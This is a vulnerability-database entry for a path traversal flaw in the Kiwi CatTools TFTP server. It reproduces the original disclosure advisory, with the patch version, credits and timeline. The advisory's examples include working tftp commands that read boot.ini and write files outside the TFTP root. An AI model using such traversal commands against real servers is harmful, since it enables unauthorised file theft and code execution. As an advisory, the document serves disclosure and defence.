Kiwi CatTools TFTP目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112323 漏洞类型 路径遍历
发布时间 2007-02-27 更新时间 2007-02-27
CVE编号 CVE-2007-0888 CNNVD-ID CNNVD-200702-228
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/3380
https://www.securityfocus.com/bid/22490
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-228
|漏洞详情
KiwiCatTools是一个管理网络设备如路由器、交换机与防火墙的工具。CatToolsTFTP服务器处理请求时存在输入验证漏洞,远程攻击者可能利用此漏洞遍历服务器目录访问任意文件。CatToolsTFTP服务器没有正确检查请求文件路径中的目录遍历串,允许远程攻击者通过特制的目录遍历序列向TFTP根目录以外的任意位置上传或下载任意文件。
|漏洞EXP
Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8 
server can lead to information disclosure and remote code execution 

Risk: High 

DISCUSSION 

Kiwi CatTools TFTP server doesn.t properly verify filename in PUT and 
GET request which can be used to download/upload any file from/to 
server. Default setting allows replacing of existing files. Such 
settings lead to probability to replace an executable files and run code 
on attacker choice. 

EXAMPLES 

C:\>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt 

Transfer successful: 212 bytes in 1 second, 212 bytes/s 

C:\>type boot.txt 

[boot loader] timeout=30 
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS 

C:\>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt 

Transfer successful: 212 bytes in 1 second, 212 bytes/s 

C:\>type pttest.txt 

[boot loader] timeout=30 
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS 

C:\> 

SOLUTION 

Upgrade to CatTools 3.2.9 which is available for download at 
http://www.kiwisyslog.com/downloads.php 

CREDITS 

Sergey Gordeychik of Positive Technologies (www.ptsecurity.com) 

DISCLOSURE TIMELINE 

Vulnerability discovered: 11/20/2006 

Initial vendor contact: 12/08/2006 

Patch released: 02/13/2007 

Public disclosure: 02/27/2007 

# milw0rm.com [2007-02-27]
|受影响的产品
Kiwi CatTools 3.2.8 Kiwi CatTools 3.1 Kiwi CatTools 2.0 Kiwi CatTools 3.2.0 beta
|参考资料

来源:BUGTRAQ
名称:20070208TFTPdirectorytraversalinKiwiCatTools
链接:http://www.securityfocus.com/archive/1/archive/1/459500/100/0/threaded
来源:XF
名称:kiwicattools-tftp-directory-traversal(32398)
链接:http://xforce.iss.net/xforce/xfdb/32398
来源:BID
名称:22490
链接:http://www.securityfocus.com/bid/22490
来源:BUGTRAQ
名称:20070213Re:TFTPdirectorytraversalinKiwiCatTools
链接:http://www.securityfocus.com/archive/1/archive/1/459933/100/0/threaded
来源:OSVDB
名称:33162
链接:http://www.osvdb.org/33162
来源:www.kiwisyslog.com
链接:http://www.kiwisyslog.com/kb/idx/5/178/article/
来源:VUPEN
名称:ADV-2007-0536
链接:http://www.frsirt.com/english/advisories/2007/0536
来源:SREASON
名称:2236
链接:http://securityreason.com/securityalert/2236
来源:SECUNIA
名称:24103
链接:http://secunia.com/advisories/24103